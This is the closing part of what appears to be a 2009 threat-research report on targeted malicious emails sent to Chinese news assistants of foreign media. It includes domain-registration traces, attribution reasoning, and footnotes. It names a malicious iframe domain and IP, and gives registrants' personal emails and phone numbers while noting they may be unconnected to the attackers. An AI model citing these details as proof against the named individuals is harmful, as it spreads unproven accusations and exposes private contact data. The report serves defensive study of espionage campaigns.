The domain names pc-officer.com and amberice.com were registered in 2007 to “wei zheng” using the email address “sunny@hetu.cn” and the phone number “86-010-4564654.” There are some links between these data and the registration data in other domain names. For example, “wei zheng” also registered “fclinux.com” with the email address “asdfi@hotmail.com” and the phone number “86 10 13810358162.” This “wei zheng” also registered “winxpupdata.com” with the phone number “86 10 13810358162” with the email address “afsaf@hotmail.com.” A variety of domain names, such as ag365.com, are registered to “Hetu Time Networking Technology Ltd.” in the name of “lin long” with the email address “harry@hetu.cn.” However the technical contact is “lin hai” with the email address “sunny@hetu.cn.”

It is unclear what the connection is here as “hetu.cn” is a domain registrar and hosting company. It is possible that the information is not connected to the attackers, but others who have been compromised by the attackers.

There is another avenue of inquiry that impacts attribution. It is not clear how the email addresses of the recipients, who are local employees for foreign journalists, were acquired by the attackers.¹³ The Reuters news story about the targeted email attacks makes an important point about those who were targeted:

The “Pam Bourdon” emails on Monday targeted Chinese news assistants, whose names often do not appear on news reports and who must be hired through an agency that reports to the Foreign Ministry.¹⁴

Considering that the contact information of these assistants was not publicly known, but was known to China’s Foreign Ministry, an element of suspicion is raised concerning the involvement of the latter. However, there are alternative explanations for how the attackers were able to assemble the list of contacts. These attackers have been actively compromising targets since at least 2007, and likely compile lists of new targets from information acquired through previous exploits. In fact, the accuracy of the email used in this case, and the malicious attachment, suggest that the attackers leveraged information stolen from previously compromised computers.

There is no evidence that directly implicates the government of China in these attacks.

However, both the timing and targets of the attack do raise questions. With the 60th anniversary of the People’s Republic if China fast approaching, it is difficult to dismiss attacks on high profile media targets such as Reuters, the Straits Times, Dow Jones, Agence France Presse, and Ansa as random events. These organizations were targeted directly, but the motivation of the attackers remains unknown. Furthermore, the use of compromised servers at the National Central University of Taiwan and the Taiwan Academic Network will no doubt add to an already tense relationship between China and Taiwan.

About IWM

The Information Warfare Monitor (www.infowar-monitor.net) is an advanced research activity tracking the emergence of cyberspace as a strategic domain. The IWM is public-private venture between two Canadian institutions: the Citizen Lab at the Munk Centre for International Studies, University of Toronto and The SecDev Group, an operational think tank based in Ottawa (Canada).

About Malware Lab

The Malware Lab (www.malwarelab.org) is an independent research collective comprised of volunteers that investigates and reports on politically motivated malware attacks, primarily against civil society organizations. The ML combines technical data with socio-political contextual analysis in order to better understand the capabilities and motivations of the attackers as well as the overall effects and broader implications of targeted attacks.

Notes

[1] See, http://www.fccchina.org/2009/09/21/warning-on-fake-emails-targeting-news-assistants/ and http://www.reuters.com/article/internetNews/idUSTRE58L0LJ20090922

[2] http://edition.cnn.com/2009/WORLD/asiapcf/09/21/china.national.day/

[3] http://www.pcworld.com/article/172627/china_clamps_down_on_internet_ahead_of_60th_anniversary.html , http://ifex.org/china/2009/09/23/censorship_and_cyber_attacks/

[4] This follows an investigation of the FCCC’s web server conducted last month. The FCCC’s WordPress installation was compromised and malicious “iframes” were inserted which loaded www.nontopworld.com/homepage.htm and www.nontopworld.com/mainpage.htm. The IP address for nontopworld.com (58.64.130.11) appears on a list of IP addresses linked to the Russian Business Network (RBN). http://doc.emergingthreats.net/pub/Main/RussianBusinessNetwork/RussianBusinessNetworkIPs.txt

[5] http://www.weforum.org/en/events/ArchivedEvents/AnnualMeetingoftheNewChampions2009/index.htm

[6] http://www.virustotal.com/analisis/dbcdddc779877d4ca2e30b6d21d407f661379155775ae39ec545984095ed07dd-1253586587

[7] http://isc.sans.org/diary.html?storyid=3400, http://www.daemon.be/maarten/Crouching_Powerpoint_Hidden_Trojan_24C3.pdf, http://www.daemon.be/maarten/targetedattacks.html, http://www.virustotal.com/analisis/755530853391444e729220443ce869e908f060c345b2c2aaac8b3cb5e6bffe7a-1190194670, http://www.virustotal.com/analisis/f5eaf65eefad528e6e46cb9c51ae3fb07b9f9b851a338235d787c963a47f80d6-1223527899, http://www.virustotal.com/analisis/d77f3145624c2ae20581265773d509d7ee9ad7e65ba187b891f777feb794ebfb-1190849733

[8] http://www.f-secure.com/weblog/archives/00001649.html and http://www.virustotal.com/analisis/cc15b6402c507364a41c32f8b4176670bc609259543523d42a865c2823b6dd2e-1238734246

[9] http://www.cc.ncu.edu.tw/Eng_faq/anti-virus.php

[10] http://blog.threatexpert.com/2009/02/politically-motivated-trojan.html, http://www.threatexpert.com/report.aspx?md5=02f2029647e85fff81620b2c333bc9cf and http://www.threatexpert.com/report.aspx?md5=7ce96a0ed4d71c26d2c377dd331e4466

[11] http://www.scribd.com/doc/13731776/Tracking-GhostNet-Investigating-a-Cyber-Espionage-Network

[12] http://www.businessweek.com/magazine/content/08_16/b4080032218430_page_4.htm

[13] http://www.themalaysianinsider.com/index.php/world/38375-e-mail-viruses-target-foreign-media-in-china

[14] http://www.nytimes.com/reuters/2009/09/22/world/international-us-china-cyberattack.html?_r=1